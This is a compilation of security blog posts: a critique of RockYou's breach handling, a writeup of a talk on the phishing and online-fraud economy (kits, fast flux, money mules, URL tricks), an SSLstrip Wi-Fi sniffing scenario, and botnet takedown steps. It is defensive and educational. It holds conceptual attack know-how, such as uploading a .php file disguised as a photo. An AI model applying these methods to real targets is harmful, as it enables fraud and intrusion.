RockYou have been complacent with what is a very serious matter. They have not taken steps to rectify the problems that caused the breach and have not addressed their users in a suitable or adequate manner. An appropriate response would have been to take the site down for a period of a few hours and enforce that users enter new passwords, which would be stored in a hashed or encrypted form. The sad thing is that companies are able to get away with being so complacent, because most users will not find out about this, most users will never be affected by it and there is zero accountability for a users private data from service providers.

If you know of any company with similar policies, such as emailing passwords in the clear – call them out in the comments or email us on tips at techcrunch.com. We will make sure that we followup with each of them, and call them out if necessary.

Currently, the main evil ways people make money off the Internet (i.e. take money from innocent you & me!) are:

1. Phishing – impersonating bank web sites in order to steal people’s banking details
2. Selling pharmaceuticals online – Viagra, of course; selling prescription drugs to people who don’t have a prescription
3. Selling cameras etc online – they take your money by Western Union, you never see the goods
4. “High yield investment programs” – the pyramid or Ponzi scheme gone online, effectively
5. Getting people to write content for them unpaid, off which they get Google Ads income – this may in fact be perfectly legal, depending on how it’s done.

Exploiting free bandwidth offers to sell internet porn was the best evil way to make money 10 years ago, but that only nets about $10 at a time. Phishing is much more profitable now, and although it’s illegal it seems phishers don’t get caught. Gentle hint: if you do decide to go into internet pron, you’ll earn more from pics of naked people than naked aardvarks!

1. Phishing

Phishing‘s been around since 1996, when people would phish for AOL details (login & password) so they could get online for free using someone else’s AOL account rather than pay ISP fees.

From 2003, bad guys have been phishing for banking website login details or other credentials by impersonating banking websites and persuading people to enter their login information in forms on the fake sites, which the baddies then capture and use to take money from the duped people’s accounts.

Phishing is mostly done through using basic standard “cookie cutter” phishing kits to send people phishing emails in order to persuade them to click links to go to the forged sites. There’s an exception, drive by phishing, where malware gets onto your computer, spots when you next go banking online and captures your keystrokes (keylogging software) or sends you to some other site when you think you’re going to your banking website – but that’s a rarity.

Usually they send people emails with scare stories like “Your bank account is about to be closed down, you must login at once, here’s the link”. And of course the link leads to their fake site, not the real bank site. In fact the most successful phishing Dr Clayton’s team have seen in the last few months hasn’t been “Your bank account is about to be closed” but “This is the IRS, we’ve been reviewing your taxes and you have a refund of $93.16 due to you, please visit our website” – and the supposed repayment will be by credit card so they have to enter their name, social security number and credit card details including the 3 digits on the back! (They tried that with HMRC-lookalike pages too but weren’t so successful as they asked for a zipcode instead of postcode on the phishing form..)

The phishers are getting more careful and more culturally aware. In the USA phishing attacks for credit union debit card details operate in very localised areas; they spam the local university or local ISP with phishing emails about that credit union, using cookie cutter kits. And phishing emails about NatWest, Nationwide etc are being sent to the UK, while emails about Italian banks are sent to .it email addresses. They’re beginning to understand that sending stuff all over the world doesn’t work very well (except for .com), and sending the spam is a major cost for them so they’re better off being more targeted in their approach. But the relationship between the numbers of spam and the numbers of phishing sites is still not understood.

If you ever decide to visit phishing site out of curiosity, do ensure your virus checker is up to date etc. Most of them fairly safe but one or two of them 1 or 2 try to upload malware to your computer too…

Phishing kits and the underground economy

Most phishers use phishing kits, their own or bought – it’s hard to monetise kits as they’re quite easy to write, so creators undercut each other, offering 3 kits for $30 etc. “Mr-Brain” even gave kits away for free but, if you check the underlying php code, they arranged for a copy of the credentials to be sent to them too, which of course is why they gave them away: the security industry knew this but it recently came out on a blog so now no one will use Mr-Brain anymore, which has annoyed law enforcement officers who were exploiting Mr-Brain kits for tracking and will now have to get on top of the new kits.

On the underground economy you can buy information on compromised machines, phishing kits etc. Phishers will keep the high value cards, and sell the rest – usually for 50% of what the buyer gets (the underground economy operates on trust, a person’s “good name” is important – if you rip someone off, they won’t deal with you again). $10 is a lot of money in Romania, so it’s worth their while selling credentials for just $10. The Times last year got hold of 30 account details including an assistant judge’s in Newcastle – because they were posing as a new buyer so someone gave them 30 for free to check the merchandise and if it was good they’d be expected to go back and buy the rest of the batch. The judge didn’t even know his details had been taken.

All of this is done on IRC; law enforcement don’t close down the channels as they’d just be put straight back up again, and they can also monitor them. Plus, most of them are hosted in places where it would be difficult to take them down. Some IRC networks are hooked up to merchant accounts so that peoplle can check if credit card numbers are “good” are not (of course, the person running the list gets a copy of the number too!).

Use of domain names

At first the phishers used lookalike domain names for their fake sites, e.g. “barqlays.com”. Then they realised that as long as the bank’s name was somewhere in the URL (web address), most non-geeks would think it was the bank’s own site and wouldn’t know that e.g. “www.barclays.com.extrasecure.com” or “www.aardvark.com/~fred/wwwbarclays.com/phishingwebsite.html” weren’t in fact Barclays sites.

Now if they used “barclays” within a domain name, Barclays would go to the domain registrar and get the domain and get it transferred to them or removed for trademark infringement (on trademark risks for UK websites, see this post). Or if they used yahoo.com/~fred/barclays etc, the bank would get the site’s system administrator to remove that particular account or sub-site (obviously it’s not a good idea to try to get the domain name “yahoo.com” expunged!).

So what’s known as the Rock Phish gang (sometimes spelt Rockfish, which is behind about half of all phishing and is thought to be the Russian mafia!) started setting up innocuous-seeming domains which don’t infringe existing trademarks, notably “Lof80.info”.They’d use that domain name for impersonations of perhaps 20 banking websites (Barclays, Bank of America, Fifth Third Bank etc), with URLs such as www.barclays.com.lof80.info/barclaysphishing/whatever – but they’d cleverly make the bits at the end of the URL look like what you normally see when you login to the real bank site.

Imp note for non-techies: the domain name for a site, e.g. “mydomainname.com”, is separate from the computer where the files for the site are stored or hosted, i.e. the files which people see when their web browser downloads those files. You buy your domain name from a domain registrar, then you choose where to store or host the files for the domain (it doesn’t have to be where you bought the domain from). With a web address like “yahoo.com/~fred/phishing” the files are in fact stored under Yahoo’s domain name, but on a sub-part of their computer servers. You can change the storage location of the files associated with a domain name, as long as you change things behind the scenes so that the domain name “points” to the files at their new location. (For Blogger users: how to use your own custom domain but hosting your blog files on Google’s Blogger / Blogspot servers). So, in this context, banks can try to get the domain name cancelled so the phishers can’t use it anymore, or else they can get whoever is hosting the phishers’ files to pull the plug and delete their account or delete their phishing files – the domain name and file storage are separate things, strictly.

In other words, when fighting phishers basically banks can either try to remove domain names, or try to get the files removed, or both.

Hosting / storage of the phishing files

Phishers needn’t store the phishing website files on their own servers, and often they don’t – they can just hack into someone else’s website and use that. They needn’t compromise the whole machine, just one user’s account, e.g. someone with a blog running WordPress (which has had some big security vulnerabilities, see more on WordPress security issues or just a couple of them!), or an insecure photo site that’s not been updated for a while, where they can just break in, upload a photo with .php at the end, run the php and get in, and then put a phishing site on there.

They also used sites that provide free web space like Alice.it. They can register a name with the free host, like “bankname.alice.it”, and then put a phishing site on that webspace, and those sites tend not to take down phishing webpages very quickly. Yahoo free sites used to be quite popular with phishers but now their take down time is 20 minutes, the average takedown time being 23.8 hours because Yahoo don’t always get told about the phishing site immediately.

Dr Clayton has a graph from May 2007 showing that alice.it basically took down those phishing sites at once, only after 3 weeks of banks complaining – they’d basically been debating what to do for the 3 weeks! (Imp note: see this post about the alice.it story.)

From Prof Clayton’s research, on average in spring 2007 phishing websites stayed up for 62 hrs. However, Rock-phish domains stayed up for 95 hrs, because it’s harder to get domain names removed than it is to get a sysadmin to delete files or an account from their site where the files are kept on a third party website.

Domain registrars who’ve never encountered phishing sites before usually have no clue for about 3 weeks. E.g. last spring when phishers moved to using .hk as their favoured top level domain (moving over from .com and .info), the local police asked the domain registrar not to remove them in order to preserve the evidence (though efforts to trace them weren’t successful as they used cutouts or went through botnets or Tor). Banks asked them to remove the phishing sites, and they eventually did.

The RockPhish gang have been getting their domains to resolve to 5 or 10 IP addresses (or computers) in parallel, changing to a different 5 or 10 IP addresses every 20 minutes or so. In other words, if you try to go to that domain in your browser, it will take you to one of 5 or 10 different physical machines hooked up to the internet, and those machines would be different ones every 20 minutes. This technique’s known as fast flux.

Once they started using fastflux, it became pretty much impossible to physically locate the phishing website – they were using other people’s compromised machines just to relay people back to their “mother ship.” At first no one understood what they were doing, and their phishing sites’ uptime went up to 196 hrs. So the baddies have been very technically innovative, to avoid being taken down.

Not only did they keep changing their name servers in order to point to changing new IP addresses, but they’ve now started putting those name servers themselves on other lof80.info-style domains they’d bought, and arranged for those to work on fast-flux too – known as double fastflux or double-flux! Everything moves around at high speed, so, like in the shell game, it’s hard to tell where anything is.

It’s difficult enough to get a registrar to remove a domain name on the basis that it’s used only for phishing, imagine trying to get them to remove a domain name that’s only used to provide name services for a domain which is only used for phishing.

Imp note: see the paper on phishing website removal times etc, An Empirical Analysis of the Current State of Phishing Attack and Defence, by Tyler Moore and Richard Clayton. See also Phishing and the economics of e-crime by Tyler Moore which also goes into the mechanics of phishing, the Rockphish attacks, and fast-flux domains.

Moving the money – money mules, and the role of geeks

Dr Clayton is also interested in how the phishing “industry” works. It’s easy to compromise sites and send out spam. As with kidnapping, the hardest bit is arranging to receive the money without getting traced or caught.

Even after phishers get hold of bank account or credit card details etc, they must still be able to move the money in quantity at speed. If they move money to their account from 30 other accounts, the banks have programs that spot this sort of thing and move it back!

So what they do is to advertise for people to “Work from home! 2 hours a day” etc, people who have their own bank account and are regularly on the internet, to work as a “payment processor” for “The Sydney Car Centre” and the like. These people are known as “money mules“. Money goes into the mule’s legitimate personal bank account, and they send it out to the phishers over Western Union. When the fraud is discovered, the bank will move the money back from the mule’s account – but the mule can’t get it back from Western Union, so not only are they out of pocket, but they risk police accusations that they must have known fraud was involved, as they were getting say 10% just for moving money around. Despite Western Union warning people not to send money to strangers, it seems some people are still fooled, saying they’re not strangers they’re my employer, look here’s my contract of employment signed by the managing director!

SOCA have realised that there are other ways to make criminal activity unattractive than prosecuting people, and if they do prosecute they need to target the right people. Taking out Mr Big is no good as a lieutenant just takes over, and catching low level mules isn’t either as they’re expendable and know very little anyway. So SOCA now concentrate on taking out the people who know how to launder money, set up a phishing site, build a spam sending engine or viruses for a botnet. This is more effective as Mr Big can’t operate without his geeks.

Measuring phishing – tracking the figures

The server logs of phishing sites (except the Rock Phish ones) are often world readable, so researchers can get a list of their most visited pages from Webalizer, and it’s interesting to see a site which has had no traffic for months spike with everyone visiting the page bankofamerica.html! Dr Clayton checks the “Thank you” page (which redirects to the real bank’s own pages) as it tells how many people visited the site and gave their details (the phishers are very polite and send people to a “thankyou” page after they’ve filled in the form). Some sites also leave gathered credentials lying around on a file on the machine called e.g. results.txt so researchers can review them.

From this research it seems about half of the people who’ve filled in their details on phishing sites have email addresses along the lins of “diespammerdie” so about half haven’t been fooled and have deliberately filled in the wrong details. Recently he came across what seemed to be a valid American Express credit card but it was said to be registered to a Fred West of 25 Cromwell Street! And he’s seen an address in the USA which was supposed to be 45 Vagina Avenue!

It’s possible to construct a mathematical model that suggests that about 15-20% of banks’ losses are through phishing rather than keyloggers, malware or skimmers on the fronts of cash machines. Everyone concentrates on phishing but no one seems to have done any research on keyloggers, who can keep enjoying a field day!

Issues and problems with banking websites

Different banks use different security methods. But most of them tend to copy each other.

Using the mouse. Clicking a letter or number of your password from a drop down list or rotating keyboard etc (as per Lloyds TSB‘s site) no longer works. It’s good against keyloggers, i.e. malware planted secretly on your computer which records keystrokes, exactly which keys you’ve pressed in what order – but these days malware will take a “snapshot” of the pixels, the area of the screen, around where you click, and then send the pic to the bad guys.

1st and 3rd characters from your password etc. Most phishers get round this by pretending it’s an emergency so you have to enter all the details, i.e. your full password. Also tests have shown that generally people get confused if they’re not asked for the characters in the “right” order (e.g. characters 7, 9 and 3 instead of 3, 7 and 9) (Imp note: although I think First Direct, and certainly ING Direct, don’t ask for them in numerical order). In fact after about 9 tries it’s possible to capture all the information anyway, with a keylogger. Banks set up their systems that way because they were more worried about shoulder surfing than keyloggers, so the systems are vulnerable to keylogger attack. It’s a question of the threat model: if they had engineered things another way keyloggers may have struggled but it would have been easier for shoulder surfers to steal banking details.

Find the face. Looking for a face or picture that you chose when you originally signed up (as per Bank of America‘s site) is supposed to confirm that you’re on the correct banking site, not a fake site.

But the bad guys can social engineer around that. They can email you and say, very sorry the main system is down as we’ve had a break-in, please would you confirm your data immediately so we can check that the data we recovered for you is accurate – and then provide a helpful link to the alternative site. Some people will accept that explanation, go to the fake site which doesn’t show any face (the system’s down isn’t it, so of course they can’t show the usual face), and dutifully enter all their details. There’s a story, who knows if it’s true or not, that an Australian bank had a huge DOS attack which took its site offline for a few days – during which a phishing attack was launched against it (or rather its customers) asking customers to visit an “emergency server”! It’s not known whether the phishing was in response to its real site being offline, or had been planned to coincide with it.

Also, the “put up a face” method doesn’t work against “man in the middle” attacks where the bad guys intercept what’s passing between you and the banking website, although such attacks are less common as they’re much harder to set up and get to work properly with phishing kits. In fact, generally almost none of the methods will work against man in middle attacks. (Imp note: another example of man in the middle.)

However, fortunately MITM attacks are not very common, there’s only a handful of them because they’re more complicated to set up. It doesn’t work very well to just compromise a random machine and try to arrange for it to work properly with a kit, you have to be very geeky to do it successfully. Most phishers use kits and none of kits do man in middle, which is why they’re not very popular.

But as mentioned they don’t need MITM. None of the security techniques will work if the phishers can produce a plausible explanation for why the security mechanism is not working. That will help them persuade the cleverer people that it’s different today for some reason, but most people won’t even notice the fact that it’s not working.

Issues with security indicators; and is your personality a factor?

Most academic research indicates that the security indicators or authentication are immaterial – no one takes any notice because they’re just concentrating on going to the bank website, even if there was something flashing red in the corner “This is dangerous don’t go here”, they won’t pay any attention because they’re focussed on logo.

A paper The Emperor’s New Security Indicators (Imp note: Symantec summary) reported on lab experiments with people which showed that, apart from physically stopping you from going to the site (which IE7 does), nothing works; even with Internet Explorer 7 you can click on one line of text to go to the site.

When explaining to someone how they’d know if a webpage is secure, it’s too difficult to explain how URLs work, how the web works, what precautions they should take to prevent malware on their computer or ADSL router, the way they should use passwords etc – so the normal explanation is “Look for the lock icon”, because that’s easy. In fact it should be “Look for the lock icon at the bottom right in the grey bar, not in the page”, but that’s not true for IE7 where it’s at the top!

Paypal works on the basis that “It’s OK because it’s green”. But a security vulnerability enables people to produce extra floating windows and put them over the browser address bar, and they could easily make their background green.

Dr Clayton used to say, hover the mouse over the link and check the address that comes up at the bottom, as there used to be tricks with very long URLs with spaces etc because they didn’t wrap properly, or tricks with @ in the URL e.g. www.barclays.com@aardvark.com (which so concerned Microsoft that they stopped it working, although it still works in a handful of ftp phishing sites). However, the hovering tip doesn’t work because of a frame bug in both IE and Firefox. If a frame doesn’t terminate properly, the browser tries to guess what it should show for the URL. The code that decides what to show when hovering over a link shows a common field, but the code for deciding where to go when you clicked the link shows another field, so it doesn’t work – when you hover over a link it might show microsoft.com, but when you click it it may take you to aardvark.com!

So there’s a big problem with explaining security to people – the problem with rules of thumb is they can be got round, and if the bad guys work out a way round them, then you’re toast because you think it’s safe when it’s not.

Dr Clayton is hoping to conduct some research this year on whether security mechanisms (which don’t work very well anyway) work better with some people than others; are there gender differences, so that mechanisms that work well for women differ for those which work well for men? If you score people on an autism / techie scale, might more autistic types work better with indicators, do certain personality types just ignore indicators when more picky people would check the lock icon?

There’s also very little research on people who may be more susceptible to social engineering or fraud. Banks, eBay etc have told Dr Clayton that they do see the same people getting suckered in time and time again.

So why aren’t banks’ security measures as good as they could be?

A couple years back, British banks lost £33 million through phishing. One bank alone lost £31 million of that, not because they were attacked more often but because they were poorer at defending (it was Barclays – who then rushed around introducing new security measures, as a result of which in the following year total British bank phishing losses were reduced to £26 million; so at least all the banks can can say they’re better than average, except for one bank!).

But for a bank, £30 million isn’t much money. To issue SecurID tokens to all its customers would cost a major bank £50 to £100 million, so it could actually take 2 or 3 years of phishing losses before it was financially worth it for it to do that.

Banks’ policies and procedures compound the problem. One attendee’s address wouldn’t validate on the form she submitted, so the bank sent her an email saying there was a problem verifying her details, please would she email back with the correct details! She wrote back to point out they were reinforcing phishing by legitimately asking for details, and why couldn’t they have say asked her to login to her account to correct her details there? Another stupid thing – one bank which shall remain nameless decided it would be a good idea to offer free webmail for all its customers – using the bank’s own domain name! Talk about helping phishers to masquerade as bank employees etc…

Also, the legal position doesn’t sufficiently incentivise banks to take better security precautions. Dr Clayton thinks we should move to a position where the banks are responsible for phishing losses. If someone forges your signature on your cheque and the bank pays out against it, it’s the bank’s problem since the 1882 Bills of Exchange Act, which is why banks concentrate on cheque fraud – because it’s their money.

But with things electronic, customers’ only protection is the UK Banking Code, which says banks will repay them if they’ve not been fraudulent. In practice the bank will argue with you and you’ll get your money back you’re if male, white, middle class and articulate! One of Dr Clayton’s colleagues Ross Anderson, who testifies in court cases on computer security, has noted a disproportionate number of cases that end up with him, where the system hasn’t worked so experts have had to be brought in to explain the position etc, appear to be not white middle class men. There seems to be some bias in the system, and Dr Clayton thinks it’s because it’s just the Banking Code (which banks voluntarily agree to), rather than a statute making it clear that the banks have to repay the money.

If the position was such that it was the bank’s money, if they were to bear the loss should they accept instructions to move money which didn’t in fact come from you in circumstances where they couldn’t prove fraud on your part, then Dr Clayton believes there would be a sea change in banks’ approach and how careful they are. At the moment many people working for banks do try to be careful, but the pressure just isn’t on banks in the right way, and things need to be changed in order to get the senior managers to care.

Why do the banks appear to try anyway? It’s reputational. None of the security indicators work, it’s all theater to persuade customers that banking sites are secure, because the really horrible thing for banks isn’t how much money they’re losing (the amounts are peanuts as far as banks are concerned), but whether people will stop trusting them. Currently about 60% of the population do their banking online; if people suddenly lost confidence and decided they didn’t want to do internet banking anymore, the banks would have to pay expensively to buy back all those trendy wine bars to turn them back into branches, and hire employees to staff them, which would cost them a lot more.

Facebook and other social networking sites

Concern was expressed about social networking sites and the like which ask you to enter your Gmail or other webmail login and password after you sign up witht them, so they can invite your friends or pull in their contact details etc.

An uncrupulous operator could easily set up a legitimate-sounding site just to phish details like that, even though it doesn’t seem to have happened yet (Imp note: I refused to give my Gmail details to Facebook, myself. They make it hard if not impossible to enter individual contacts manually (or through copy/paste or the like), I assume precisely because they want to put pressure on you to give in your webmail details and let them spam all your contacts!)

There’s another specific risk with Facebook. You know all those Facebook apps that let you throw sheep at people, send them kisses etc? Most of these apps are now created by third parties who have nothing to do with Facebook. If baddies create a compelling enough Facebook app that people will want to install (games etc), once you install that app it (and the people behind it) will then be able to access everything that Facebook knows about you. Because for Facebook apps the basic model is – “Let the application access everything that Facebook knows about me”? Yes or No. Period. (Imp note: incidentally this explains Facebook privacy settings well, see also How to prevent Facebook applications from spamming your mini-feed; and for anyone interested, you should soon be able to get out of Facebook’s Hotel California, at least if you’re in the UK).

So you might want to be very selective about installing Facebook apps!

eBay

eBay runs on trust and 99% of the time it works. But it’s not a good idea to buy flatscreen TVs off Ebay without looking hard at the seller’s feedback! People phish Ebay to get hold of high value accounts with good feedback, especially where it’s blurred whether it’s as buyer or seller. So you might find someone who used to buy and sell tea cosies for years suddenly having flat screen TVs and laptops to sell. Someone in California bought and sold Ferraris, and he got very good feedback until he sold the same car to 40 people in parallel. When he tried run away they caught him within 3 days..

Educating the public about scams and social engineering

People fall for scams because they don’t understand how they work. But educating people will never fix social engineering. People have been conning others for hundreds of years, and people have been falling for it. The notorious Kevin Mitnick was not some uber hacker but very good at social engineering, getting people to do things – see his book The Art of Deception (Amazon: The Art of Deception: Controlling the Human Element of Security). E.g. to break into a telephone company he needed a SecurID number, so he rang the company, said he was a telephone engineer up a pole in Kansas in a blizzard and he’d left his SecurID by his bed 20 miles away. They said it’s OK the manager has one for emergencies, and got it from the drawer and read the number out to him over the phone!

People do that because they’re helpful. Some other scams involved ringing up a switchboard and getting the name of someone in the corporation, then ringing that person up and saying “Hi I’m from HR I’m new here”, and they’d say “Oh you must work for X”, and then he’d ring up the next person and say “I’m X from HR” and just keep building on it. The only hacking thing he did was to go into their reception so that phone number on their caller ID would be internal.

The only way to stop someone from social engineering your company is to make all receptionists very unhelpful and rude to everyone and never tell them anything. Of course, some UK companies already along those lines! But seriously, it’s very difficult to protect a company from social engineering.

Educating the public is good (and Egg used to run late night ads explaining some Net scams), but it has significant limitations. It may seem an obvious scam that an African dictator has $17m to give you, but the web is full of fake banks, eg the “Nation Buildingwide Bank”, which have been set up solely to help fool the “marks“, who are given login details. They can login to check a supposed bank account to which “their” money has been transferred, though if they try to transfer it out it will say sorry can’t do that because you’ve not paid X fee, etc. But you can in fact login to these “banks” and see the “money” sitting there!

These scams are called 419 scams after section 419 of the Nigerian code because people believe they came out of Nigeria. [Imp note: in fact earlier this year three West Africans were convicted of 419 scams in New York.] These scams are actually a variation on the “Spanish prisoner” scam which dates back to the 1600s! In the 17th century conmen would wander aroud England talking about a nobleman locked up in a castle in Spain. Naturally, he had lots of money, and the conman would say he was trying to raise money to form a group of mercenaries to rescue the nobleman, and when he was rescued he would be very grateful and reward everyone who contributed to his rescue – so would you like to cough up please?

It worked in the 1600s, it works today – social engineering will be almost impossible to get rid of. Banks must be made to concentrate, by changing the liability laws, and equally they must rely on the fact that most would be bad guys try to do “cookie cutter” stuff, they move money in the same way, and it’s possible to pick up the patterns, see what’s going on and then stop it in order to reduce these losses.

2. Selling pills online

The pharmaceuticals sold online from the “better” pill sites are in fact real, e.g. sleeping tablets, because these sites are mainly selling to addicts who can’t get the drugs off their doctors anymore, and if what they are sent doesn’t work they won’t buy from that site again. In business it’s easier to sell more things to existing customers than go find new customers, so that’s what these sites do and that’s why they are still around. They still send spam email etc to find new customers, but they keep selling to old customers.

The take down period for pill sites is usually months. Some of them are also on fast flux networks so the only way to remove them is to remove the domain name, and it’s very hard to get registrars to understand that the name is only being used to host a Canadian pharmacy which is illegal under the laws of X, Y etc.

3. Selling cameras etc online

These sites are often run out of China. They tempt people with cameras etc at bargain prices e.g. Nikon D70S with lens for 150 euros! Some of them are quite plausible in that the offered prices are quite close to the going rate. They even have chat facilities on their sites where punters can ask about the products etc.

But they say they don’t take credit cards, you have to send the money to them by Western Union to order the goods. And of course, that’s the last you see of your money and you never get the goods. The admonition to never send money by Western Union to “strangers” seems not to work on people intent on a discount, particularly if they’ve chatted with the site concerned so they don’t think they’re “strangers”!

4. “High yield investment” programs – make money fast!!

Pyramid schemes or Ponzi schemes are common in the real world, e.g. about 2 years ago there was “Women helping Women” run from the Isle of Wight in the UK. And about 10 years back most of the economy of Albania was involved in a Ponzi scheme, before it collapsed.

These schemes work very well for the perpetrators. They offer to pay people a few percent on their investment – that’s a few % per day – but of course they pay those who invested earlier from the money they get from those who join later. And they can do this over the internet.

It seems everyone who takes part knows it’s a Ponzi scheme but they’re still getting their few per cent. a day and if it runs for another 50 days or so they’ll make their money back – so in a sense you could say it’s not really a Ponzi scheme, but gambling. Punters are gambling that the scheme will do well enough to get them their “investment” back and maybe more. Dr Clayton calls them “post-modern Ponzi schemes” because everyone who plays, at least earlier on, knows it’s gambling!

These schemes are very common, especially in Russia, as kits are readily available for about £50. A recent search on a particular phrase turned up 12,000 schemes. However in the UK it’s illegal to run pyramid schemes.

Those who set up these schemes will buy domain names and hosting at the start, run the scheme for 20 days or so before collecting the money then moving on to buy another domain name, etc. Some of them go as far as to buy https certificates for their website security!

There are even reputation services which provide statistics (independent or depending on bribes from scheme owners!) on which schemes are paying out ad worth investing in.

5. Google Ads – the red-blooded American Privila way…

Getting an AdSense account then putting Google Ads on your website is another way to make money online. But to make more than a minimal amount of money, you need to write a very interesting page (e.g. Markus Kuhn‘s page on A4 paper is the most popular page on the Cambridge University Computer Laboratory security group’s site), or else arrange to be high up in the search results.

Now a mob called Privila sent Dr Clayton spam asking him to link to them (more links to them improve how much they get per ad click). So he investigated them. They have a clever technique for, how shall I put this, “leveraging” Google Ads in order to make money. (Imp note: before anyone asks why I’m seemingly helping them out with the link in the first sentence, note the rel=nofollow!)

Privila’s business model is to buy up existing domain names that have expired, paying attention to links in to those domains, their ranking with Google etc. They then get people to create content that fits the domain name, e.g. kitchencabinetswisconsin.com (kitchen cabinets!) or theaccidents.com (car accidents) etc, and they fill those pages with advertisements.

Here’s the extra cunning thing – Privila get people to write content for them for free, by advertising for (unpaid) “interns”, e.g. recent graduates from university, journalism courses etc. Interns are given assignments like 3 articles a week, which are posted on the Web under their bylines, the attraction for them being that they can supposedly build up their CVs to show to potential employers. A great way to get people to work for you for free and make money off their content from Google Ads at the same time! (Whether the writers can write well or know anything about the diverse random subjects they’re asked to write on, e.g. computer security, is another matter…)

Dr Clayton’s team built a model of this, and found that Privila have about 300 or 400 domains, and about 100-150 writing for them as “interns”. (UPDATE Imp note: for more by Dr Clayton’s team on Privila, from Light Blue Touchpaper see this and this.)

Although some might think this sort of thing was rather evil because it could be seen as exploitative, it’s at the legal end of the spectrum, and indeed is probably very all American.

A very illuminating talk, indeed. I wish I’d had the chance to ask questions there. I’d like to know things like:

• Why is it expensive for phishers to send spam? I thought email was pretty much free…
• How do the phishers avoid being tracked down through their domain name purchases?

The SSL enabled log in sessions on the tested, Nokia N95, HTC Tilt, Android G1 and iPhone 3GS devices was sniffed using the publicly available SSLstrip tool, with the attack taking place over insecure Wi-Fi network, now prevalent literally everywhere. Here’s the scenario they used, and possible mitigation approaches:

“The attacker visits the same cafe that offers a free Wi-Fi hotspot and decides to employ basic host, network identification and enumeration tools from the laptop to enumerate all the active devices connected to the Wi‐Fi hotspot. From the results, the attacker notices a MAC address referring to a Nokia smartphone. The attacker know that there is little to no detection capabilities present on an overwhelming majority of smartphone’s in use today, so the owner would likely never find out about a successful man-in-the-middle- attack (MITM).

The well-informed attacker creates a successful MITM attack. In the meantime, the smartphone owner accesses the online bank website and enters the login credentials required to gain access to the banking information. In this scenario, all of the communication between the smartphone and the online bank site is routed through the attacker’s machine and the attacker can see the login details in plain text, as well as can capture all the sites accessed by the victim.”

The awareness-raising test aims to educate users on approaching convenient and free, public Wi-Fi networks with caution, emphasizing on how their mobile service provider’s 3G connection, or the one offered by a trusted Wi-Fi network should always be considered as their first choice.
Anyway, just how insecure or susceptible to compromise are the majority of Wi-Fi networks found on high-trafficked locations such as airports or international cities? The answer is sadly, self-evident with data backing it up available publicly.

• Go through related posts: GPU-Accelerated Wi-Fi password cracking goes mainstream; D-Link router’s CAPTCHA flawed, WPA passphrase retrieved; Survey: 88% of Mumbai’s wireless networks easy to compromise

Last year, AirTight Networks conducted a major wireless network security study by visiting 14 airports (11 in the U.S and 3 in the Asia-Pacific) and found out that a huge percentage of the 478 Wi-Fi Access Points analyzed are either open, or using outdated encryption protocols. Even more interesting was the fact that users were falling victims to “viral” Wi-Fi networks using descriptive and lucrative names seeking to establish legitimacy.

The prevalence of such “handy”, but easy to compromise Wi-Fi networks internationally, is virtually the same. For instance, similar wardriving tests conducted in Paris; Santiago, Chile; China; Monterrey — Mexico, Sao Paulo – Brazil, Caracas (Venezuela), Warsaw, and London offer similar insights into the “security” of such public networks.

Possible mitigation practices? According to Marlinspike, the author of the tool:
Cautious users, for example, have been advised to explicitly visit https URLs or to use bookmarks in order to protect themselves from sslstrip, while other SSL/TLS based protocols such as imaps, pop3s, smtps, ssl/irc, and SSL-based VPNs never present an opportunity for stripping. This talk will outline some new tools and tricks aimed at these points of communication, ultimately providing highly effective attacks on SSL/TLS connections themselves.
How often do you face the trade-off of using a public, and possible insecure Wi-Fi hotspot, for the sake of convenience instead of sticking to your 3G data plan, even when traveling abroad?

Have you ever avoided using your mobile device and instead used your laptop at an airport, due to your host-based firewall’s better ARP filtering features — if any — enabling the detecting of changed MAC address for a (trusted) gateway network adapter in order to detect possible MItM attempts?

How EV SSL-aware is your E-banking provider, especially if you’re E-banking over a mobile device? Or do you simply “VPN-and-forget” over a public Wi-Fi network?

The following note is inspired by the steps the folks at FireEye Malware Intelligence Lab took to disable the Mega-d/Ozdok bot network. People often wonder what it takes to shut down a botnet. Here are the key steps, which apply to “traditional” botnets, which don’t rely heavily on peer-to-peer protocols for their command and control (C&C) implementation; the number of hosts and domains that such botnets use can be sufficiently small that a group or an individual can disrupt the botnet by getting these IPs or domain names shut down.

Note that attempting to interfere with operations of a profitable botnet can be dangerous, as your actions may cause attackers to retaliate. Therefore, consider these steps as informational thoughts, rather than an encouragement to follow FireEye’s footsteps.

1. Obtain a copy of the bot through forensic analysis of a compromised system. It helps to get hands on several instances of the malicious program, in case multiple variants possess meaningful behavioral differences.
2. Understand the bot’s command and control mechanism. How does the attacker control the botnet? Reverse-engineer the malicious program to understand the C&C protocol and to get a sense for the commands the botnet understands. You may find a way to authenticate to the botnet and, posing as the attacker, commandeer it. (Warning: As Andre posted in the comments, “Logging on to network that is not your own, and issuing commands to take it over could potentially be considered illegal access.”)
3. Identify which systems, if taken off line, could disrupt the botnet. To accomplish this, look for weaknesses in the command and control implementation, such as the reliance on a small set of servers to distribute commands or weakness in the C&C servers’ IP or domain names generation algorithm. (You may recall how researchers at UC-Santa Barbara gained control over an instance of the Torpig botnet.)
4. Contact ISPs hosting suspected C&C servers. In your correspondence with them, present documentation that supports your claim that the systems they are hosting are being misused. Be specific about which IPs violate the ISP’s policy by acting maliciously and should be disabled.
5. Contact registrars of C&C domains. In your correspondence with them, present documentation that supports your claim that the domains they are hosting are being misused. Be specific about which domains violate the registrar’s policy by being used for malicious purposes and should be disabled.
6. Consider registering unused domains that the botnet’s C&C mechanism may attempt to use later. This can be expensive, depending on the number of domain names associated with the botnet’s C&C implementation.

Botnets come in different shapes, sizes, and flavors. The steps above don’t apply to all of them, but they should give you a sense for how defenders can take action against traditional botnets. For an example of these steps in the context of a specific botnet, see the “Smashing the Mega-d/Ozdok botnet in 24 hours” write-up by FireEye.